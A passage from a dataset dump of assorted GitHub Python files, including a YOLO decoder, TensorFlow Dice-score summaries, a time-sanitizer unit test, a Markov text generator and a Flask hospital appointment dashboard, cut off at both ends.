i.attr.href\n\tr.lpush(\"books:tag_urls\",tag)\n\nprint(\"共有%d个tags\"%len(alist))\n\n","repo_name":"zwq-qianyu/douban_books","sub_path":"tag_urls.py","file_name":"tag_urls.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"71160654014","text":"import argparse\n\n\nfrom Parser.Shutterstock_parser import get_images\nfrom Database.database_creator import creator\nfrom Database.database_operations import add_photo, get_photos\n\n\ndef main(params):\n download_data = params['download_data']\n number_of_images = params['number_of_images']\n section = params['section']\n folder = params['section']\n get_data = params['get_data']\n\n if download_data:\n creator()\n pictures = get_images(number_of_images, section, folder)\n for pic in pictures:\n add_photo(pic[0], pic[1])\n if get_data:\n pictures = get_photos()\n return pictures\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--number_of_images', default=10, type=int, help='number of images to download')\n parser.add_argument('-s', '--section', default='', type=str, help='type of pictures to search for')\n parser.add_argument('-f', '--folder', default='', type=str, help='folder where to download')\n parser.add_argument('-g', '--get_data', default=False, type=bool,\n help='return data from database or no(False/True)')\n parser.add_argument('-d', '--download_data', default=True, type=bool,\n help='put data into database or no(False/True)')\n args = parser.parse_args()\n params = vars(args)\n main(params)\n","repo_name":"arsentim45/Image_captioning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2391587013","text":"import datetime\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef open_lib_and_creat_dict(myfile):\n try:\n print(datetime.datetime.now())\n now = datetime.datetime.now()\n file = open(myfile)\n yield file\n finally:\n file.close()\n print(datetime.datetime.now())\n then = datetime.datetime.now()\n delta = then - now\n print(delta.microseconds)\n\ndef get_shop_list_by_dishes(menu, dishes, person_count):\n ee = {}\n for name in dishes:\n for ingridient in menu[name.strip()]:\n # ingridient = dict[name]\n # print(ingridient)\n if ingridient['ingridient_name'] in ee.keys():\n ee[ingridient['ingridient_name']]['quantity'] += ingridient['quantity'] * person_count\n else:\n ee[ingridient['ingridient_name']] = {\n 'measure': ingridient['measure'],\n 'quantity': ingridient['quantity'] * person_count\n }\n return ee\n\ndef read_you_cbook(name_of_file):\n menu = {}\n with open_lib_and_creat_dict(name_of_file) as f:\n while True:\n title = f.readline().strip()\n # print(type(line))\n if not title:\n break\n menu[title] = []\n num = f.readline()\n n = int(num)\n\n for i in range(n):\n [ingridient_name, quantity, measure] = f.readline().split('|')\n menu[title].append({\n 'ingridient_name': ingridient_name.strip(),\n 'quantity': int(quantity.strip()),\n 'measure': measure.strip()\n })\n\n f.readline()\n\n return menu\n\n\ndef main():\n menu = read_you_cbook('cookbook')\n\n names = input('введите название блюд').split(',')\n number = int(input('введите колличество гостей'))\n print(menu)\n\n shop = get_shop_list_by_dishes(menu, names, number)\n print(shop)\n print(datetime.datetime.now())\n then = datetime.datetime.now()\n delta = then - now\n print(delta.microseconds)\n\nif __name__ == '__main__':\n main()\n","repo_name":"sepetytimur/maneger_contecsta","sub_path":"maneger1.py","file_name":"maneger1.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26819880118","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 7 01:27:40 2020\n\n@author: maniac\n\"\"\"\n\nfrom hyper_parameters import OBJECTNESS_THREHOLD,GRID_DIM,NUM_ANCHOR,\\\nIMAGE_H,IMAGE_W,NUM_CLASSES,get_dictionaries\nimport tensorflow as tf\nANCHORS = tf.constant([[0.4,0.2],[0.3,0.3],[0.2,0.4]])\nidx2cat,cat2idx = get_dictionaries()\n\nimport cv2\nimport numpy as np\n\n#input is single prediction y\n#output is boxes,cat list\ndef decode_yolo_output(y):\n\n #THIS FUNCTION works for SIG(TX),SIG(TY) values in y NOT TX,TY\n\n objectness= tf.reshape(tf.cast( y[...,0] >OBJECTNESS_THREHOLD ,tf.int32),[-1])\n boxes_loc = tf.where(objectness)\n no_ofBoxes = tf.shape(boxes_loc)[0]\n\n \n index = tf.cast(boxes_loc/NUM_ANCHOR,tf.int64)\n #index consist of index of box with object in itp\n \n anchor_index = boxes_loc%NUM_ANCHOR\n Num_y = tf.cast(index/GRID_DIM,tf.int32)\n Num_x = index%GRID_DIM \n\n sig_tx= tf.gather( tf.reshape(y[...,1],[-1]) , boxes_loc)\n sig_ty= tf.gather( tf.reshape(y[...,2],[-1]) , boxes_loc)\n tw= tf.gather( tf.reshape(y[...,3],[-1]) , boxes_loc)\n th= tf.gather( tf.reshape(y[...,4],[-1]) , boxes_loc)\n \n \n Factor_x = tf.math.divide(IMAGE_W,GRID_DIM)\n Factor_y = tf.math.divide(IMAGE_H,GRID_DIM)\n \n #in pixels\n centre_x= Factor_x*(tf.cast(Num_x,tf.float32) + sig_tx) \n centre_y= Factor_y*(tf.cast(Num_y,tf.float32) + sig_ty)\n centre_x = tf.squeeze(centre_x)\n centre_y = tf.squeeze(centre_y)\n \n out = tf.squeeze(tf.gather(ANCHORS,anchor_index),1)\n \n \n width = out[...,0]*tf.squeeze( tf.math.exp(tw) ) #ANCHOR first dim is width\n height = out[...,1] * tf.squeeze( tf.math.exp(th) ) \n\n #in pixels\n width = width * IMAGE_W\n height = height * IMAGE_H\n\n #Convert back to categories\n one_hot_vectors =tf.squeeze( tf.gather( tf.reshape(y[...,5:],[-1,NUM_CLASSES]), boxes_loc))\n class_ID = tf.argmax(one_hot_vectors, axis=-1)\n\n \n x_min= (centre_x - width/2)\n x_max= tf.minimum((centre_x + width/2),IMAGE_W-1)\n y_min= tf.maximum((centre_y - height/2),0)\n y_max= tf.minimum((centre_y + height/2),IMAGE_H-1)\n\n boxes = tf.stack([x_min,y_min,x_max,y_max])\n \n return boxes,class_ID\n\n#input is (image,y)\n#image size is fixed as per hyper_parameters\ndef display_yolo_output(img,y): \n boxes,class_ID = decode_yolo_output(y)\n class_ID = class_ID.numpy()\n class_ID = np.squeeze(class_ID)\n box_labels = [idx2cat[i] for i in class_ID]\n\n print(box_labels)\n img = img.numpy()*255\n img = np.ndarray.astype(img,np.uint8)\n \n\n for i in range(0, len(boxes[0])):\n # changed color and width to make it visible\n cv2.rectangle(img, (boxes[0][i], boxes[1][i]), (boxes[2][i], boxes[3][i]), (255, 0, 0), 2)\n cv2.imshow(\"img\", img[...,::-1])#back convert to bgr from rgb to display\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n","repo_name":"lastsupper108/Lucid_Yolo","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71935779743","text":"import calendar\nimport logging\nimport os\nimport tempfile\nimport time\nimport unittest\nfrom unittest import mock\n\nfrom cros.factory.tools import time_sanitizer\nfrom cros.factory.utils import file_utils\n\n\nBASE_TIME = float(\n calendar.timegm(time.strptime('Sat Jun 9 00:00:00 2012')))\n\nSECONDS_PER_DAY = 86400\n\n\n# pylint: disable=protected-access\nclass TimeSanitizerTestBase(unittest.TestCase):\n\n def setUp(self):\n self.fake_time = mock.Mock(time_sanitizer.Time)\n\n self.sanitizer = time_sanitizer.TimeSanitizer(\n self.state_file,\n monitor_interval_secs=30,\n time_bump_secs=60,\n max_leap_secs=SECONDS_PER_DAY)\n self.sanitizer._time = self.fake_time\n self.sanitizer._suppress_exceptions = False\n\n def run(self, result=None):\n with file_utils.TempDirectory(\n prefix='time_sanitizer_unittest.') as temp_dir:\n # pylint: disable=attribute-defined-outside-init\n self.state_file = os.path.join(temp_dir, 'state_file')\n super(TimeSanitizerTestBase, self).run(result)\n\n def _ReadStateFile(self):\n return float(open(self.state_file).read().strip())\n\n\nclass TimeSanitizerBaseTimeTest(TimeSanitizerTestBase):\n\n def runTest(self):\n # pylint: disable=protected-access\n # (access to protected members)\n with tempfile.NamedTemporaryFile() as f:\n self.assertEqual(\n os.stat(f.name).st_mtime,\n time_sanitizer.GetBaseTimeFromFile([f.name]))\n self.assertEqual(\n None, time_sanitizer.GetBaseTimeFromFile(['/some-nonexistent-file']))\n\n\nclass TimeSanitizerTest(TimeSanitizerTestBase):\n\n def runTest(self):\n self.fake_time.Time.return_value = BASE_TIME\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.Time.reset_mock()\n\n # Now move forward 1 second, and then forward 0 seconds. Should\n # be fine.\n for unused_iteration in range(2):\n self.fake_time.Time.return_value = BASE_TIME + 1\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME + 1, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.Time.reset_mock()\n\n # Now move forward 2 days. This should be considered hosed, so\n # the time should be bumped up by time_bump_secs (120).\n self.fake_time.Time.return_value = BASE_TIME + 2 * SECONDS_PER_DAY\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME + 61, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.Time.reset_mock()\n self.fake_time.SetTime.assert_called_with(BASE_TIME + 61)\n\n # Move forward a bunch. Fine.\n self.fake_time.Time.return_value = BASE_TIME + 201.5\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME + 201.5, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.Time.reset_mock()\n\n # Jump back 20 seconds. Not fine!\n self.fake_time.Time.return_value = BASE_TIME + 181.5\n\n self.sanitizer.RunOnce()\n self.assertEqual(BASE_TIME + 261.5, self._ReadStateFile())\n self.fake_time.Time.assert_called_once_with()\n self.fake_time.SetTime.assert_called_with(BASE_TIME + 261.5)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n unittest.main()\n","repo_name":"arccode/factory","sub_path":"py/tools/time_sanitizer_unittest.py","file_name":"time_sanitizer_unittest.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"36141663699","text":"# Written by Chun Kit Wong and CIRC under MIT license:\n# https://github.com/wong-ck/DeepSegment/blob/master/LICENSE\n\nimport tensorflow as tf\n\n\ndef trainables():\n for trainable in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):\n tf.summary.histogram(str(trainable.name).replace(':', '_'), trainable)\n\n\ndef ndim_image(\n name,\n tensor,\n min_value=None,\n max_value=None,\n max_outputs=3,\n collections=None,\n family=None\n):\n img = tensor\n\n # extract middle slices if weightage_mask is higher than 2D\n img_shape = img.get_shape().as_list()\n img_dim = len(img_shape)\n if img_dim > 3:\n img_begin = [0 if i < 3 else img_shape[i] // 2 for i in range(img_dim)]\n\n img_size = [img_shape[i] if i < 3 else 1 for i in range(img_dim)]\n img_size[0] = -1\n\n img = tf.slice(img, img_begin, img_size)\n\n # reshape\n img = tf.reshape(img, tf.stack((-1, img_shape[1], img_shape[2], 1)))\n\n # clip value\n if any((x is not None) for x in [min_value, max_value]):\n # determine threshold values\n if min_value is None:\n min_value = tf.math.reduce_min(img)\n\n if max_value is None:\n max_value = tf.math.reduce_max(img)\n\n # cast to float32\n img = tf.cast(img, tf.float32)\n\n # clip value\n img = tf.clip_by_value(img, min_value, max_value)\n\n # shift and rescale value\n img += min_value\n img *= 255.0 / (max_value - min_value)\n\n # cast to uint8 so that tf.summary.image doesn't perform rescaling\n img = tf.cast(img, tf.uint8)\n\n # tf.summary: add as image\n return tf.summary.image(\n name=name,\n tensor=img,\n max_outputs=max_outputs,\n collections=collections,\n family=family\n )\n\n\ndef categorical_dices(\n labels,\n predictions,\n nclasses,\n presences=None,\n classnames=None,\n epsilon=1e-10,\n collections=None,\n family=None,\n):\n # check that classnames has correct length (if defined)\n if classnames is None:\n classnames = [\"cat{:02d}\".format(i) for i in range(nclasses)]\n\n if len(classnames) != nclasses:\n msg = \"classnames must be a list of length nclasses!\"\n raise ValueError(msg)\n\n # prepare presence array\n if presences is None:\n presences = tf.ones(shape=(1, nclasses), dtype=tf.float32)\n else:\n presences = tf.cast(presences, dtype=tf.bool)\n presences = tf.cast(presences, dtype=tf.float32)\n # shape: (1, nclasses) or (batchsize, nclasses)\n\n # calculate dice score (per image per class/category)\n dice_per_img_per_cls = _calculate_dice_per_img_per_cls(\n labels, predictions, nclasses, epsilon\n )\n # shape: (batchsize, nclasses)\n\n # calculate dice score (per class/category)\n dice_per_cls = []\n for cat in range(nclasses):\n # create a mask to exclude dice of all other classes\n mask = tf.one_hot(cat, depth=nclasses, dtype=tf.float32)\n mask = tf.expand_dims(mask, axis=0)\n # shape: (1, nclasses)\n\n mask *= presences\n # shape: (1, nclasses) or (batchsize, nclasses)\n\n mask *= tf.clip_by_value(dice_per_img_per_cls, 1.0, 1.0)\n # shape: (batchsize, nclasses)\n\n # calculate average dice (across batch)\n dice_sum = tf.reduce_sum(mask * dice_per_img_per_cls)\n dice_count = tf.reduce_sum(mask)\n\n dice_score = tf.cond(\n tf.less(dice_count, epsilon),\n true_fn=lambda: tf.convert_to_tensor(-1.0, dtype=tf.float32),\n false_fn=lambda: dice_sum / dice_count\n )\n\n dice_per_cls += [dice_score]\n\n # add to tf.summary\n summary_bufs = []\n for classname, dice_score in zip(classnames, dice_per_cls):\n buf = tf.summary.scalar(\"dice_\" + classname, dice_score, family=family)\n summary_bufs += [buf]\n\n return summary_bufs\n\n\ndef average_dice(\n labels,\n predictions,\n nclasses,\n presences=None,\n classnames=None,\n weights=1.0,\n epsilon=1e-10,\n collections=None,\n family=None,\n):\n # check that classnames has correct length (if defined)\n if classnames is None:\n classnames = [\"cat{:02d}\".format(i) for i in range(nclasses)]\n\n if len(classnames) != nclasses:\n msg = \"classnames must be a list of length nclasses!\"\n raise ValueError(msg)\n\n # check that weights has correct length\n if any(isinstance(weights, x) for x in [int, float]):\n weights = [weights] * nclasses\n\n if len(weights) != nclasses:\n msg = \"if weights is a list, length must be nclasses!\"\n raise ValueError(msg)\n\n # prepare presence array\n if presences is None:\n presences = tf.ones(shape=(1, nclasses), dtype=tf.float32)\n else:\n presences = tf.cast(presences, dtype=tf.bool)\n presences = tf.cast(presences, dtype=tf.float32)\n # shape: (1, nclasses) or (batchsize, nclasses)\n\n # calculate dice score (per image per class/category)\n dice_per_img_per_cls = _calculate_dice_per_img_per_cls(\n labels, predictions, nclasses, epsilon\n )\n # shape: (batchsize, nclasses)\n\n # create a weightage mask by merging weights and presences\n mask = tf.convert_to_tensor(weights, dtype=tf.float32)\n # shape: (nclasses,)\n\n mask = tf.expand_dims(mask, axis=0)\n # shape: (1, nclasses)\n\n mask *= presences\n # shape: (1, nclasses) or (batchsize, nclasses)\n\n mask *= tf.clip_by_value(dice_per_img_per_cls, 1.0, 1.0)\n # shape: (batchsize, nclasses)\n\n # calculate average dice (across batch)\n dice_sum = tf.reduce_sum(mask * tf.convert_to_tensor(dice_per_img_per_cls))\n dice_count = tf.reduce_sum(mask)\n\n dice_mean = tf.cond(\n tf.less(dice_count, epsilon),\n true_fn=lambda: tf.convert_to_tensor(-1.0, dtype=tf.float32),\n false_fn=lambda: dice_sum / dice_count\n )\n\n return tf.summary.scalar(\"dice_mean\", dice_mean, family=family)\n\n\ndef _calculate_dice_per_img_per_cls(labels, predictions, nclasses, epsilon):\n # prepare images\n onehot_labels = tf.one_hot(labels, depth=nclasses)\n onehot_preds = tf.one_hot(predictions, depth=nclasses)\n\n # calculate dice score (per image per class/category)\n reduce_axis = range(1, len(onehot_labels.get_shape()) - 1)\n reduce_axis = tuple(reduce_axis)\n\n i = tf.reduce_sum(onehot_labels * onehot_preds, axis=reduce_axis)\n l = tf.reduce_sum(onehot_preds, axis=reduce_axis)\n r = tf.reduce_sum(onehot_labels, axis=reduce_axis)\n\n dice_per_img_per_cls = tf.divide(2 * i + epsilon, (l + r) + epsilon)\n # shape: (batchsize, nclasses)\n\n return dice_per_img_per_cls\n","repo_name":"wong-ck/DeepSegment","sub_path":"utilities/tfwrapper/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":6614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32001011170","text":"import psycopg2\nimport numpy\nfrom nltk.tokenize import toktok\n\nfrom nltk.stem.snowball import SnowballStemmer\nfrom search import lemmatize_search, get_articles, get_url_by_article_uid\nfrom tf_idf import get_idf\n\nfrom nltk.corpus import stopwords\nfrom typing import Callable\nfrom pymystem3 import Mystem\nfrom copy import deepcopy\nimport math\n\nsb_stemmer = SnowballStemmer(\"russian\")\n\ndef get_tf_idf(connection, article_id):\n query = \"\"\"\n SELECT term_id, tf_idf FROM article_term\n WHERE article_id = %s\n \"\"\"\n connection.execute(query, (article_id, ))\n results = dict(connection.fetchall())\n return results\n\nCOS = dict()\n\nif __name__ == \"__main__\":\n connection = psycopg2.connect(database='postgres',\n user='postgres',\n password='postgres',\n host='0.0.0.0',\n port=4321)\n cursor = connection.cursor()\n try:\n search_string = str(input(\"Input search word: \"))\n lemmas = lemmatize_search(search_string)\n articles_ids = list(map(lambda lem: get_articles(cursor, lem), lemmas))\n merged_article_ids = set()\n for ids in articles_ids:\n merged_article_ids = merged_article_ids.union(set(ids))\n for article_id in merged_article_ids:\n tf_idf = get_tf_idf(cursor, article_id)\n idf = get_idf(cursor)\n numerator = .0; den_A = .0; den_B = .0\n for term_id, tf_idf in tf_idf.items():\n numerator += tf_idf * idf.get(term_id, 0)\n den_A += idf.get(term_id, 0) ** 2\n den_B += tf_idf ** 2\n COS[article_id] = numerator / (math.sqrt(den_A) * math.sqrt(den_B))\n results = sorted(COS.items(), key=lambda k: k[1], reverse=True)[:10]\n for id, value in results:\n print(get_url_by_article_uid(cursor, id), value)\n except Exception as e:\n print(e)\n finally:\n cursor.close()\n connection.close()\n","repo_name":"MardanovTimur/smart-search","sub_path":"cos_similarity.py","file_name":"cos_similarity.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"44279010534","text":"# %%\r\nimport json\r\nimport xml.etree.ElementTree as ElementTree\r\nimport dateutil.parser as dtparser\r\nimport pandas as pd\r\nfrom lib import dictFind, getXmlData, pivotMerge, reshapeExtInfo\r\n\r\n\r\ndef getEssays(data_frame):\r\n \"\"\"Requires columns 'accessionNumber' and 'ExtendedInfo_diffs'\"\"\"\r\n\r\n item_nums = list(data_frame['accessionNumber'].drop_duplicates())\r\n out_txts = dict.fromkeys(item_nums)\r\n\r\n for item in item_nums:\r\n print('Processing essay item \"{}\"...'.format(item))\r\n item_cmds = (cmd for row in data_frame.loc[data_frame.accessionNumber ==\r\n item].ExtendedInfo_diffs if row for cmd in row)\r\n text = ''\r\n for cmd in item_cmds:\r\n text = processInput(text, **cmd)\r\n\r\n out_txts[item] = text\r\n\r\n return out_txts\r\n\r\n\r\ndef processInput(in_str, **kwargs):\r\n\r\n try:\r\n cmd_str = kwargs['edit']\r\n txt_pos = kwargs['pos']\r\n txt_len = kwargs['len']\r\n txt = kwargs['text']\r\n except KeyError:\r\n return None\r\n\r\n chars = list(in_str)\r\n\r\n def cmdDel():\r\n nonlocal chars, txt_len, txt_pos\r\n for _ in range(txt_len):\r\n # Position can sometimes be greater than the length?? Default to end instead\r\n txt_pos = min([txt_pos, len(chars)])\r\n if chars:\r\n chars.pop(txt_pos-1)\r\n\r\n def cmdIns():\r\n # Some (but not all) spaces seem to be encoded. Replace these\r\n nonlocal chars, txt, txt_pos\r\n txt = txt.replace('\\xa0', ' ')\r\n for i, char in enumerate(list(txt)):\r\n chars.insert(txt_pos-1+i, char)\r\n\r\n cmd = {'INS': cmdIns,\r\n 'DEL': cmdDel}\r\n\r\n cmd[cmd_str]()\r\n\r\n return ''.join(chars)\r\n\r\n\r\n# %%\r\n\r\n\r\ndef parseExtInfo(data_frame, attr_list=('name', 'diffs', 'textLength')):\r\n \"\"\"Convert ExtendedInfo JSON data from Pilot Observables into columns\"\"\"\r\n\r\n if not 'ExtendedInfo' in data_frame.columns:\r\n return None\r\n\r\n # '3513001666_ObservableData.Xml': Why is there invalid JSON data in a \"Pilot Observables\" row?\r\n # Should be \"Vertical Item Scroll\"?\r\n # Need to work around this\r\n ext_info = list()\r\n for val in data_frame['ExtendedInfo']:\r\n try:\r\n ext_info.append(json.loads(val))\r\n except json.JSONDecodeError:\r\n ext_info.append(val)\r\n\r\n for colname in attr_list:\r\n data_frame['ExtendedInfo_{0}'.format(colname)] = [dictFind(\r\n val, colname) or val for val in ext_info]\r\n\r\n return data_frame\r\n\r\n\r\ndef postProcWriting(data_frame):\r\n # Somewhat hacky at the moment - needs clean up and generalization\r\n df = data_frame.query('interpretation==\"Pilot Observables\"')\r\n df = df[['accessionNumber', 'itemType', 'blockCode', 'ID_outcomeVariable',\r\n 'fieldIdentifier', 'text_value']]\r\n\r\n # Columns to uniquely identify transformed rows\r\n id_cols = ['accessionNumber', 'itemType',\r\n 'blockCode', 'ID_outcomeVariable']\r\n\r\n # Pivot to create one column for time and another for ExtendedInfo\r\n cols_df = df.drop_duplicates(id_cols)[id_cols]\r\n data_df = df.pivot(index='ID_outcomeVariable',\r\n columns='fieldIdentifier', values='text_value')\r\n\r\n # Drop missing ExtendedInfo and re-merge ID columns\r\n data_df = data_df[data_df['ExtendedInfo'].notna()]\r\n data_df = pd.merge(cols_df, data_df, on='ID_outcomeVariable')\r\n\r\n # Parse EventTime as datetime and sort\r\n data_df['EventTime'] = [dtparser.parse(\r\n dtstr) for dtstr in list(data_df['EventTime'])]\r\n data_df = data_df.sort_values(\r\n by=['EventTime', 'accessionNumber', 'ID_outcomeVariable'])\r\n\r\n # Unwind columns\r\n # '3513001666_ObservableData.Xml': Why is there invalid JSON data in a \"Pilot Observables\" row?\r\n # Should be \"Vertical Item Scroll\"?\r\n # Need to work around this\r\n ext_info = list()\r\n for val in data_df['ExtendedInfo']:\r\n try:\r\n ext_info.append(json.loads(val))\r\n# ext_info = [json.loads(val) for val in data_df['ExtendedInfo']]\r\n except json.JSONDecodeError:\r\n ext_info.append({})\r\n\r\n for colname in ['name', 'diffs', 'textContext', 'textLength']:\r\n data_df['ExtendedInfo_{0}'.format(colname)] = [dictFind(\r\n val_dict, colname) for val_dict in ext_info]\r\n\r\n return data_df.loc[(data_df.ExtendedInfo_name == 'text.change') & (data_df.ExtendedInfo_diffs.notna())]\r\n\r\n\r\n# %%\r\n","repo_name":"dyee-air/xml_procdata","sub_path":"postproc/pp_writing_text.py","file_name":"pp_writing_text.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10341854719","text":"from markovmodel import MarkovModel\nfrom tokenize import tokenize\nimport pickle\nimport sys\n\n\nif __name__ == \"__main__\":\n # set to 100,000 to avoid max recursion depth exceeded error\n sys.setrecursionlimit(100000)\n # c = Corpus version number\n c = 5\n words = tokenize(\"corpus/clean_corpus_{}.txt\".format(c))\n model = None\n # n = lookback\n n = 3\n # if a model already exists load it\n with open(\"models/trained_model{}_{}.p\".format(c, n), \"rb\") as file:\n if len(list(file.peek())) > 0:\n model = pickle.load(file)\n # if not, train one and pickle it\n if not model:\n with open(\"models/trained_model{}_{}.p\".format(c, n), \"wb\") as file:\n model = MarkovModel()\n model.train(words, n)\n pickle.dump(model, file)\n inp = input(\"Len: \")\n # keep asking for length\n while input != 0:\n sentences = model.random_walk(int(inp))\n print(sentences)\n inp = input(\"Len: \")\n","repo_name":"MakeSchool-17/twitter-bot-python-darioncassel","sub_path":"markovmodel_tester.py","file_name":"markovmodel_tester.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"3850091168","text":"from datetime import datetime\n\nimport psycopg2\nfrom flask import Blueprint, render_template, flash, request, jsonify\nfrom flask_login import login_required, current_user\nfrom flask_sqlalchemy import get_debug_queries\n#from flask_sqlalchemy import or_\n\nfrom app import db, POSTGRES_PASS, POSTGRES_USER, POSTGRES_DB, POSTGRES_URL\nfrom dashboard.forms import AppointmentCreationForm, TreatmentCreationForm, PatientCreationForm, DoctorForm\nfrom dashboard.models import Appointment, Treatment\nfrom users.models import Patient, Polyclinic\n\ndashboard = Blueprint('dashboard', __name__)\n\n\n@dashboard.route('/')\n@dashboard.route('/dashboard')\n@login_required\ndef profile():\n return current_user.user_dashboard()\n\n\n@dashboard.route('/make_appointment', methods=['GET', 'POST'])\n@login_required\ndef create_appointment():\n form = AppointmentCreationForm()\n if request.method == 'GET':\n return render_template('appointment.html', form=form)\n\n if request.method == 'POST':\n if form.validate_on_submit():\n patient = Patient.query.filter_by(p_tc=form.patient_tc.data).first()\n polyclinic = Polyclinic.query.filter_by(pol_name=form.polyclinic_name.data).first()\n new_appointment = Appointment(\n patient_tc=patient.p_tc,\n poly_name=polyclinic.pol_name,\n on_date=datetime.combine(form.on.data, form.hour.data),\n )\n if current_user.user_type == 'Patient':\n current_user.appos1.append(new_appointment)\n\n if current_user.user_type == 'Polyclinic':\n current_user.appos2.append(new_appointment)\n\n db.session.add(new_appointment)\n db.session.commit()\n flash('Randevu basariyla kaydedildi.')\n\n return render_template('appointment.html', form=form)\n\n\n@dashboard.route('/create_new_patient', methods=['GET', 'POST'])\n@login_required\ndef create_patient():\n conn = get_db_connection()\n usr_id_s = conn.cursor()\n usr_id_s.execute('SELECT user_id FROM appuser;')\n user_ids = usr_id_s.fetchall()\n patient_usrnames = conn.cursor()\n patient_usrnames.execute('SELECT p_name FROM patient, appuser where p_id=user_id;')\n # remove edildiginde appuser database'inden silinmeyip, patient database'inden silindigi icin\n # kullanici adi auto gen. icin yapildi.\n patient_usernames = patient_usrnames.fetchall()\n pat_tcs = conn.cursor()\n pat_tcs.execute('SELECT p_tc FROM patient;')\n patient_tc = pat_tcs.fetchall()\n\n patient_creation_form = PatientCreationForm()\n if request.method == 'GET':\n return render_template('create_patient.html', patient_creation_form=patient_creation_form)\n\n if request.method == 'POST':\n if patient_creation_form.validate_on_submit():\n new_patient = Patient(\n p_name=patient_creation_form.p_name.data,\n p_last_name=patient_creation_form.p_last_name.data,\n p_tc=patient_creation_form.p_tc.data,\n p_bdate=patient_creation_form.p_bdate.data,\n p_phone=patient_creation_form.p_phone.data,\n p_address=patient_creation_form.p_address.data,\n user_id=len(user_ids) + 1,\n username='pat' + str(len(patient_usernames) + 1),\n user_password='123456',\n user_type='Patient'\n )\n\n sameTCFlag = False\n for tc in patient_tc:\n print('length Ptc = ' + str(len(patient_tc)))\n if new_patient.p_tc == tc[0]:\n flash('Hata Olustu : Insan mi klonluyoruz???.', 'error')\n sameTCFlag = True\n\n if not sameTCFlag:\n db.session.add(new_patient)\n # ustteki komut:\n # INSERT INTO appuser (username, user_password, user_type) VALUES (%(username)s, %(user_password)s, %(user_type)s);\n db.session.commit()\n flash('Bilgi : Hasta bilgileri olusturuldu.', 'message')\n\n return render_template('create_patient.html', user=current_user,\n patient_creation_form=patient_creation_form)\n\n\n@dashboard.route('/register_new_treatment', methods=['GET', 'POST'])\n@login_required\ndef register_new_treatment():\n treatment_creation_form = TreatmentCreationForm()\n if request.method == 'GET':\n return render_template('register_new_treatment.html', treatment_creation_form=treatment_creation_form)\n\n if request.method == 'POST':\n if treatment_creation_form.validate_on_submit():\n new_treatment = Treatment(\n pa_tc=treatment_creation_form.patient_tckn.data,\n d_tc='12345678901',\n diagnosis=treatment_creation_form.diagnosis.data,\n treatment=treatment_creation_form.treatment.data,\n )\n db.session.add(new_treatment)\n db.session.commit()\n flash('Tedavi olusturuldu.')\n\n return render_template('register_new_treatment.html', user=current_user,\n treatment_creation_form=treatment_creation_form)\n\n\n@dashboard.route('/list_patient', methods=['GET', 'POST'])\n@login_required\ndef list_patient():\n patients = Patient.query.all()\n print(get_debug_queries())\n if request.method == \"POST\":\n id = request.form['button-delete']\n Patient.query.filter_by(p_id=id).delete()\n db.session.commit()\n patients = Patient.query.all()\n return render_template('list_patient.html', patients=patients)\n return render_template('list_patient.html', patients=patients)\n\n\n@dashboard.route('/list_treatments', methods=['GET', 'POST'])\n@login_required\ndef list_treatments():\n treatments = Treatment.query.all()\n print(get_debug_queries())\n if request.method == \"POST\":\n id = request.form['button-delete']\n Treatment.query.filter_by(patient_tc=id).delete()\n db.session.commit()\n treatments = Treatment.query.all()\n return render_template('list_treatments.html', treatments=treatments)\n return render_template('list_treatments.html', treatments=treatments)\n\n@dashboard.route('/delete_patient', methods=['GET'])\n@login_required\ndef delete_patient():\n p_id = request.args['button-delete']\n temp_patient = Patient.query.filter_by(p_id=p_id)\n Patient.query.filter_by(patient_id=p_id).delete()\n db.session.commit()\n return jsonify({'msg': \"{} silindi.\".format(temp_patient.p_name)})\n\n\n@dashboard.route('/display_registers', methods=['GET', 'POST'])\n@login_required\ndef display_registers():\n if current_user.user_type == 'Patient':\n appointments = current_user.appos1\n\n if current_user.user_type == 'Polyclinic':\n appointments = current_user.appos2\n print(get_debug_queries())\n if request.method == \"POST\":\n id = request.form['button-delete']\n Appointment.query.filter_by(patient_tc=id).delete()\n db.session.commit()\n appointments = Appointment.query.all()\n return render_template('display_registers.html', appointments=appointments)\n return render_template('display_registers.html', appointments=appointments)\n\n\n@dashboard.route('/search_patient', methods=['POST'])\n@login_required\ndef search_patient():\n if request.form['text'] == \"\":\n return jsonify({})\n patients = Patient.query.filter(\n\n 